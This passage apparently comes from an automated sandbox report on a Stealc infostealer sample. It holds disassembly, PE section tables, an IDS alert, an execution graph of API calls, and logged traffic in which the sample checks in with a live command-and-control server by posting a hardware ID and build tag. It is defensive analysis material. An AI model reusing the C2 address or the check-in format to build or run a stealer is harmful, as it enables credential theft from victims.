                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add cl, ch
                    add byte ptr [eax], ah
                    add byte ptr [eax], al
                    add byte ptr [edi], al
                    or al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and al, byte ptr [eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    or al, 80h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                     | 0x1000 | 0x25b000 | 0x22800 | d7d1d63a7eb704a58b4820c0c9fec9c6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                     | 0x25e000 | 0x296000 | 0x200 | 5da3d2ca74cf4b5d6e598dc4ca788149 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    nqjulsar | 0x4f4000 | 0x192000 | 0x191e00 | 18fff6a414eeedd80ed797fe1e38e779 | False | 0.9948356094479005 | data | 7.953541884791292 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    snoulpuy | 0x686000 | 0x1000 | 0x600 | aac337af25137a0e5d6d06219892447d | False | 0.5540364583333334 | data | 4.936756454301773 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant | 0x687000 | 0x3000 | 0x2200 | 9e77368093bca2c2c04615d569949c48 | False | 0.06583180147058823 | DOS executable (COM) | 0.7565841088042602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    DLL | Import
                    kernel32.dll | lstrcpy
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-10-03T20:46:02.261931+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Oct 3, 2024 20:46:01.287861109 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:01.292972088 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                    Oct 3, 2024 20:46:01.293071985 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:01.293270111 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:01.298510075 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                    Oct 3, 2024 20:46:02.028907061 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                    Oct 3, 2024 20:46:02.029037952 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:02.031928062 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:02.036823988 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                    Oct 3, 2024 20:46:02.261742115 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                    Oct 3, 2024 20:46:02.261930943 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    Oct 3, 2024 20:46:04.884344101 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                    • 185.215.113.37
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 5588 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Oct 3, 2024 20:46:01.293270111 CEST | 89 | OUT | GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 3, 2024 20:46:02.028907061 CEST | 203 | IN | HTTP/1.1 200 OK
                    Date: Thu, 03 Oct 2024 18:46:01 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 3, 2024 20:46:02.031928062 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBK
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 46 45 44 30 37 44 31 37 30 45 31 38 34 35 31 35 30 30 37 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
                    Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="hwid"DDFED07D170E1845150070------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="build"doma------GIEBAECAKKFCBFIEGCBK--
                    Oct 3, 2024 20:46:02.261742115 CEST | 210 | IN | HTTP/1.1 200 OK
                    Date: Thu, 03 Oct 2024 18:46:02 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=



                    Target ID:0
                    Start time:14:45:57
                    Start date:03/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x460000
                    File size:1'802'752 bytes
                    MD5 hash:EDECDB123BA6A0D389FF9B2993754C49
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2052957198.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2094357724.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true


                      Execution Graph

                      Execution Coverage:8.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
API calls 14465->14466 14467 463be5 14466->14467 14468 4645c0 2 API calls 14467->14468 14469 463bfe 14468->14469 14470 4645c0 2 API calls 14469->14470 14471 463c17 14470->14471 14472 4645c0 2 API calls 14471->14472 14473 463c30 14472->14473 14474 4645c0 2 API calls 14473->14474 14475 463c49 14474->14475 14476 4645c0 2 API calls 14475->14476 14477 463c62 14476->14477 14478 4645c0 2 API calls 14477->14478 14479 463c7b 14478->14479 14480 4645c0 2 API calls 14479->14480 14481 463c94 14480->14481 14482 4645c0 2 API calls 14481->14482 14483 463cad 14482->14483 14484 4645c0 2 API calls 14483->14484 14485 463cc6 14484->14485 14486 4645c0 2 API calls 14485->14486 14487 463cdf 14486->14487 14488 4645c0 2 API calls 14487->14488 14489 463cf8 14488->14489 14490 4645c0 2 API calls 14489->14490 14491 463d11 14490->14491 14492 4645c0 2 API calls 14491->14492 14493 463d2a 14492->14493 14494 4645c0 2 API calls 14493->14494 14495 463d43 14494->14495 14496 4645c0 2 API calls 14495->14496 14497 463d5c 14496->14497 14498 4645c0 2 API calls 14497->14498 14499 463d75 14498->14499 14500 4645c0 2 API calls 14499->14500 14501 463d8e 14500->14501 14502 4645c0 2 API calls 14501->14502 14503 463da7 14502->14503 14504 4645c0 2 API calls 14503->14504 14505 463dc0 14504->14505 14506 4645c0 2 API calls 14505->14506 14507 463dd9 14506->14507 14508 4645c0 2 API calls 14507->14508 14509 463df2 14508->14509 14510 4645c0 2 API calls 14509->14510 14511 463e0b 14510->14511 14512 4645c0 2 API calls 14511->14512 14513 463e24 14512->14513 14514 4645c0 2 API calls 14513->14514 14515 463e3d 14514->14515 14516 4645c0 2 API calls 14515->14516 14517 463e56 14516->14517 14518 4645c0 2 API calls 14517->14518 14519 463e6f 14518->14519 14520 4645c0 2 API calls 14519->14520 14521 463e88 14520->14521 14522 4645c0 2 API calls 14521->14522 14523 463ea1 14522->14523 14524 4645c0 2 API calls 14523->14524 14525 463eba 14524->14525 14526 4645c0 2 API calls 14525->14526 14527 463ed3 14526->14527 14528 4645c0 2 API calls 
14527->14528 14529 463eec 14528->14529 14530 4645c0 2 API calls 14529->14530 14531 463f05 14530->14531 14532 4645c0 2 API calls 14531->14532 14533 463f1e 14532->14533 14534 4645c0 2 API calls 14533->14534 14535 463f37 14534->14535 14536 4645c0 2 API calls 14535->14536 14537 463f50 14536->14537 14538 4645c0 2 API calls 14537->14538 14539 463f69 14538->14539 14540 4645c0 2 API calls 14539->14540 14541 463f82 14540->14541 14542 4645c0 2 API calls 14541->14542 14543 463f9b 14542->14543 14544 4645c0 2 API calls 14543->14544 14545 463fb4 14544->14545 14546 4645c0 2 API calls 14545->14546 14547 463fcd 14546->14547 14548 4645c0 2 API calls 14547->14548 14549 463fe6 14548->14549 14550 4645c0 2 API calls 14549->14550 14551 463fff 14550->14551 14552 4645c0 2 API calls 14551->14552 14553 464018 14552->14553 14554 4645c0 2 API calls 14553->14554 14555 464031 14554->14555 14556 4645c0 2 API calls 14555->14556 14557 46404a 14556->14557 14558 4645c0 2 API calls 14557->14558 14559 464063 14558->14559 14560 4645c0 2 API calls 14559->14560 14561 46407c 14560->14561 14562 4645c0 2 API calls 14561->14562 14563 464095 14562->14563 14564 4645c0 2 API calls 14563->14564 14565 4640ae 14564->14565 14566 4645c0 2 API calls 14565->14566 14567 4640c7 14566->14567 14568 4645c0 2 API calls 14567->14568 14569 4640e0 14568->14569 14570 4645c0 2 API calls 14569->14570 14571 4640f9 14570->14571 14572 4645c0 2 API calls 14571->14572 14573 464112 14572->14573 14574 4645c0 2 API calls 14573->14574 14575 46412b 14574->14575 14576 4645c0 2 API calls 14575->14576 14577 464144 14576->14577 14578 4645c0 2 API calls 14577->14578 14579 46415d 14578->14579 14580 4645c0 2 API calls 14579->14580 14581 464176 14580->14581 14582 4645c0 2 API calls 14581->14582 14583 46418f 14582->14583 14584 4645c0 2 API calls 14583->14584 14585 4641a8 14584->14585 14586 4645c0 2 API calls 14585->14586 14587 4641c1 14586->14587 14588 4645c0 2 API calls 14587->14588 14589 4641da 14588->14589 14590 4645c0 2 API calls 14589->14590 
14591 4641f3 14590->14591 14592 4645c0 2 API calls 14591->14592 14593 46420c 14592->14593 14594 4645c0 2 API calls 14593->14594 14595 464225 14594->14595 14596 4645c0 2 API calls 14595->14596 14597 46423e 14596->14597 14598 4645c0 2 API calls 14597->14598 14599 464257 14598->14599 14600 4645c0 2 API calls 14599->14600 14601 464270 14600->14601 14602 4645c0 2 API calls 14601->14602 14603 464289 14602->14603 14604 4645c0 2 API calls 14603->14604 14605 4642a2 14604->14605 14606 4645c0 2 API calls 14605->14606 14607 4642bb 14606->14607 14608 4645c0 2 API calls 14607->14608 14609 4642d4 14608->14609 14610 4645c0 2 API calls 14609->14610 14611 4642ed 14610->14611 14612 4645c0 2 API calls 14611->14612 14613 464306 14612->14613 14614 4645c0 2 API calls 14613->14614 14615 46431f 14614->14615 14616 4645c0 2 API calls 14615->14616 14617 464338 14616->14617 14618 4645c0 2 API calls 14617->14618 14619 464351 14618->14619 14620 4645c0 2 API calls 14619->14620 14621 46436a 14620->14621 14622 4645c0 2 API calls 14621->14622 14623 464383 14622->14623 14624 4645c0 2 API calls 14623->14624 14625 46439c 14624->14625 14626 4645c0 2 API calls 14625->14626 14627 4643b5 14626->14627 14628 4645c0 2 API calls 14627->14628 14629 4643ce 14628->14629 14630 4645c0 2 API calls 14629->14630 14631 4643e7 14630->14631 14632 4645c0 2 API calls 14631->14632 14633 464400 14632->14633 14634 4645c0 2 API calls 14633->14634 14635 464419 14634->14635 14636 4645c0 2 API calls 14635->14636 14637 464432 14636->14637 14638 4645c0 2 API calls 14637->14638 14639 46444b 14638->14639 14640 4645c0 2 API calls 14639->14640 14641 464464 14640->14641 14642 4645c0 2 API calls 14641->14642 14643 46447d 14642->14643 14644 4645c0 2 API calls 14643->14644 14645 464496 14644->14645 14646 4645c0 2 API calls 14645->14646 14647 4644af 14646->14647 14648 4645c0 2 API calls 14647->14648 14649 4644c8 14648->14649 14650 4645c0 2 API calls 14649->14650 14651 4644e1 14650->14651 14652 4645c0 2 API calls 14651->14652 14653 4644fa 
14652->14653 14654 4645c0 2 API calls 14653->14654 14655 464513 14654->14655 14656 4645c0 2 API calls 14655->14656 14657 46452c 14656->14657 14658 4645c0 2 API calls 14657->14658 14659 464545 14658->14659 14660 4645c0 2 API calls 14659->14660 14661 46455e 14660->14661 14662 4645c0 2 API calls 14661->14662 14663 464577 14662->14663 14664 4645c0 2 API calls 14663->14664 14665 464590 14664->14665 14666 4645c0 2 API calls 14665->14666 14667 4645a9 14666->14667 14668 479c10 14667->14668 14669 47a036 8 API calls 14668->14669 14670 479c20 43 API calls 14668->14670 14671 47a146 14669->14671 14672 47a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14669->14672 14670->14669 14673 47a216 14671->14673 14674 47a153 8 API calls 14671->14674 14672->14671 14675 47a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14673->14675 14676 47a298 14673->14676 14674->14673 14675->14676 14677 47a337 14676->14677 14678 47a2a5 6 API calls 14676->14678 14679 47a344 9 API calls 14677->14679 14680 47a41f 14677->14680 14678->14677 14679->14680 14681 47a4a2 14680->14681 14682 47a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14680->14682 14683 47a4dc 14681->14683 14684 47a4ab GetProcAddress GetProcAddress 14681->14684 14682->14681 14685 47a515 14683->14685 14686 47a4e5 GetProcAddress GetProcAddress 14683->14686 14684->14683 14687 47a612 14685->14687 14688 47a522 10 API calls 14685->14688 14686->14685 14689 47a67d 14687->14689 14690 47a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14687->14690 14688->14687 14691 47a686 GetProcAddress 14689->14691 14692 47a69e 14689->14692 14690->14689 14691->14692 14693 47a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14692->14693 14694 475ca3 14692->14694 14693->14694 14695 461590 14694->14695 15816 461670 14695->15816 14698 47a7a0 lstrcpy 14699 4615b5 14698->14699 14700 47a7a0 lstrcpy 14699->14700 14701 4615c7 14700->14701 14702 47a7a0 
lstrcpy 14701->14702 14703 4615d9 14702->14703 14704 47a7a0 lstrcpy 14703->14704 14705 461663 14704->14705 14706 475510 14705->14706 14707 475521 14706->14707 14708 47a820 2 API calls 14707->14708 14709 47552e 14708->14709 14710 47a820 2 API calls 14709->14710 14711 47553b 14710->14711 14712 47a820 2 API calls 14711->14712 14713 475548 14712->14713 14714 47a740 lstrcpy 14713->14714 14715 475555 14714->14715 14716 47a740 lstrcpy 14715->14716 14717 475562 14716->14717 14718 47a740 lstrcpy 14717->14718 14719 47556f 14718->14719 14720 47a740 lstrcpy 14719->14720 14758 47557c 14720->14758 14721 47a820 lstrlen lstrcpy 14721->14758 14722 4751f0 20 API calls 14722->14758 14723 475643 StrCmpCA 14723->14758 14724 4756a0 StrCmpCA 14726 4757dc 14724->14726 14724->14758 14725 47a7a0 lstrcpy 14725->14758 14727 47a8a0 lstrcpy 14726->14727 14728 4757e8 14727->14728 14729 47a820 2 API calls 14728->14729 14731 4757f6 14729->14731 14730 47a740 lstrcpy 14730->14758 14733 47a820 2 API calls 14731->14733 14732 475856 StrCmpCA 14734 475991 14732->14734 14732->14758 14737 475805 14733->14737 14736 47a8a0 lstrcpy 14734->14736 14735 47a8a0 lstrcpy 14735->14758 14738 47599d 14736->14738 14739 461670 lstrcpy 14737->14739 14740 47a820 2 API calls 14738->14740 14753 475811 14739->14753 14742 4759ab 14740->14742 14741 4752c0 25 API calls 14741->14758 14746 47a820 2 API calls 14742->14746 14743 475a0b StrCmpCA 14744 475a16 Sleep 14743->14744 14745 475a28 14743->14745 14744->14758 14747 47a8a0 lstrcpy 14745->14747 14748 4759ba 14746->14748 14749 475a34 14747->14749 14750 461670 lstrcpy 14748->14750 14751 47a820 2 API calls 14749->14751 14750->14753 14752 475a43 14751->14752 14754 47a820 2 API calls 14752->14754 14753->13813 14755 475a52 14754->14755 14757 461670 lstrcpy 14755->14757 14756 47578a StrCmpCA 14756->14758 14757->14753 14758->14721 14758->14722 14758->14723 14758->14724 14758->14725 14758->14730 14758->14732 14758->14735 14758->14741 14758->14743 14758->14756 14759 461590 lstrcpy 
14758->14759 14760 47593f StrCmpCA 14758->14760 14759->14758 14760->14758 14762 477553 GetVolumeInformationA 14761->14762 14763 47754c 14761->14763 14765 477591 14762->14765 14763->14762 14764 4775fc GetProcessHeap RtlAllocateHeap 14766 477619 14764->14766 14767 477628 wsprintfA 14764->14767 14765->14764 14769 47a740 lstrcpy 14766->14769 14768 47a740 lstrcpy 14767->14768 14770 475da7 14768->14770 14769->14770 14770->13834 14772 47a7a0 lstrcpy 14771->14772 14773 464899 14772->14773 15825 4647b0 14773->15825 14775 4648a5 14776 47a740 lstrcpy 14775->14776 14777 4648d7 14776->14777 14778 47a740 lstrcpy 14777->14778 14779 4648e4 14778->14779 14780 47a740 lstrcpy 14779->14780 14781 4648f1 14780->14781 14782 47a740 lstrcpy 14781->14782 14783 4648fe 14782->14783 14784 47a740 lstrcpy 14783->14784 14785 46490b InternetOpenA StrCmpCA 14784->14785 14786 464944 14785->14786 14787 464ecb InternetCloseHandle 14786->14787 15831 478b60 14786->15831 14788 464ee8 14787->14788 15846 469ac0 CryptStringToBinaryA 14788->15846 14790 464963 15839 47a920 14790->15839 14793 464976 14795 47a8a0 lstrcpy 14793->14795 14800 46497f 14795->14800 14796 47a820 2 API calls 14797 464f05 14796->14797 14798 47a9b0 4 API calls 14797->14798 14801 464f1b 14798->14801 14799 464f27 codecvt 14802 47a7a0 lstrcpy 14799->14802 14804 47a9b0 4 API calls 14800->14804 14803 47a8a0 lstrcpy 14801->14803 14815 464f57 14802->14815 14803->14799 14805 4649a9 14804->14805 14806 47a8a0 lstrcpy 14805->14806 14807 4649b2 14806->14807 14808 47a9b0 4 API calls 14807->14808 14809 4649d1 14808->14809 14810 47a8a0 lstrcpy 14809->14810 14811 4649da 14810->14811 14812 47a920 3 API calls 14811->14812 14813 4649f8 14812->14813 14814 47a8a0 lstrcpy 14813->14814 14816 464a01 14814->14816 14815->13837 14817 47a9b0 4 API calls 14816->14817 14818 464a20 14817->14818 14819 47a8a0 lstrcpy 14818->14819 14820 464a29 14819->14820 14821 47a9b0 4 API calls 14820->14821 14822 464a48 14821->14822 14823 47a8a0 lstrcpy 14822->14823 14824 464a51 
14823->14824 14825 47a9b0 4 API calls 14824->14825 14826 464a7d 14825->14826 14827 47a920 3 API calls 14826->14827 14828 464a84 14827->14828 14829 47a8a0 lstrcpy 14828->14829 14830 464a8d 14829->14830 14831 464aa3 InternetConnectA 14830->14831 14831->14787 14832 464ad3 HttpOpenRequestA 14831->14832 14834 464ebe InternetCloseHandle 14832->14834 14835 464b28 14832->14835 14834->14787 14836 47a9b0 4 API calls 14835->14836 14837 464b3c 14836->14837 14838 47a8a0 lstrcpy 14837->14838 14839 464b45 14838->14839 14840 47a920 3 API calls 14839->14840 14841 464b63 14840->14841 14842 47a8a0 lstrcpy 14841->14842 14843 464b6c 14842->14843 14844 47a9b0 4 API calls 14843->14844 14845 464b8b 14844->14845 14846 47a8a0 lstrcpy 14845->14846 14847 464b94 14846->14847 14848 47a9b0 4 API calls 14847->14848 14849 464bb5 14848->14849 14850 47a8a0 lstrcpy 14849->14850 14851 464bbe 14850->14851 14852 47a9b0 4 API calls 14851->14852 14853 464bde 14852->14853 14854 47a8a0 lstrcpy 14853->14854 14855 464be7 14854->14855 14856 47a9b0 4 API calls 14855->14856 14857 464c06 14856->14857 14858 47a8a0 lstrcpy 14857->14858 14859 464c0f 14858->14859 14860 47a920 3 API calls 14859->14860 14861 464c2d 14860->14861 14862 47a8a0 lstrcpy 14861->14862 14863 464c36 14862->14863 14864 47a9b0 4 API calls 14863->14864 14865 464c55 14864->14865 14866 47a8a0 lstrcpy 14865->14866 14867 464c5e 14866->14867 14868 47a9b0 4 API calls 14867->14868 14869 464c7d 14868->14869 14870 47a8a0 lstrcpy 14869->14870 14871 464c86 14870->14871 14872 47a920 3 API calls 14871->14872 14873 464ca4 14872->14873 14874 47a8a0 lstrcpy 14873->14874 14875 464cad 14874->14875 14876 47a9b0 4 API calls 14875->14876 14877 464ccc 14876->14877 14878 47a8a0 lstrcpy 14877->14878 14879 464cd5 14878->14879 14880 47a9b0 4 API calls 14879->14880 14881 464cf6 14880->14881 14882 47a8a0 lstrcpy 14881->14882 14883 464cff 14882->14883 14884 47a9b0 4 API calls 14883->14884 14885 464d1f 14884->14885 14886 47a8a0 lstrcpy 14885->14886 14887 464d28 14886->14887 
14888 47a9b0 4 API calls 14887->14888 14889 464d47 14888->14889 14890 47a8a0 lstrcpy 14889->14890 14891 464d50 14890->14891 14892 47a920 3 API calls 14891->14892 14893 464d6e 14892->14893 14894 47a8a0 lstrcpy 14893->14894 14895 464d77 14894->14895 14896 47a740 lstrcpy 14895->14896 14897 464d92 14896->14897 14898 47a920 3 API calls 14897->14898 14899 464db3 14898->14899 14900 47a920 3 API calls 14899->14900 14901 464dba 14900->14901 14902 47a8a0 lstrcpy 14901->14902 14903 464dc6 14902->14903 14904 464de7 lstrlen 14903->14904 14905 464dfa 14904->14905 14906 464e03 lstrlen 14905->14906 15845 47aad0 14906->15845 14908 464e13 HttpSendRequestA 14909 464e32 InternetReadFile 14908->14909 14910 464e67 InternetCloseHandle 14909->14910 14911 464e5e 14909->14911 14914 47a800 14910->14914 14911->14909 14911->14910 14913 47a9b0 4 API calls 14911->14913 14915 47a8a0 lstrcpy 14911->14915 14913->14911 14914->14834 14915->14911 15852 47aad0 14916->15852 14918 4717c4 StrCmpCA 14919 4717cf ExitProcess 14918->14919 14931 4717d7 14918->14931 14920 4719c2 14920->13839 14921 4718cf StrCmpCA 14921->14931 14922 4718ad StrCmpCA 14922->14931 14923 471913 StrCmpCA 14923->14931 14924 471932 StrCmpCA 14924->14931 14925 4718f1 StrCmpCA 14925->14931 14926 471951 StrCmpCA 14926->14931 14927 471970 StrCmpCA 14927->14931 14928 47187f StrCmpCA 14928->14931 14929 47185d StrCmpCA 14929->14931 14930 47a820 lstrlen lstrcpy 14930->14931 14931->14920 14931->14921 14931->14922 14931->14923 14931->14924 14931->14925 14931->14926 14931->14927 14931->14928 14931->14929 14931->14930 14933 47a7a0 lstrcpy 14932->14933 14934 465979 14933->14934 14935 4647b0 2 API calls 14934->14935 14936 465985 14935->14936 14937 47a740 lstrcpy 14936->14937 14938 4659ba 14937->14938 14939 47a740 lstrcpy 14938->14939 14940 4659c7 14939->14940 14941 47a740 lstrcpy 14940->14941 14942 4659d4 14941->14942 14943 47a740 lstrcpy 14942->14943 14944 4659e1 14943->14944 14945 47a740 lstrcpy 14944->14945 14946 4659ee InternetOpenA StrCmpCA 
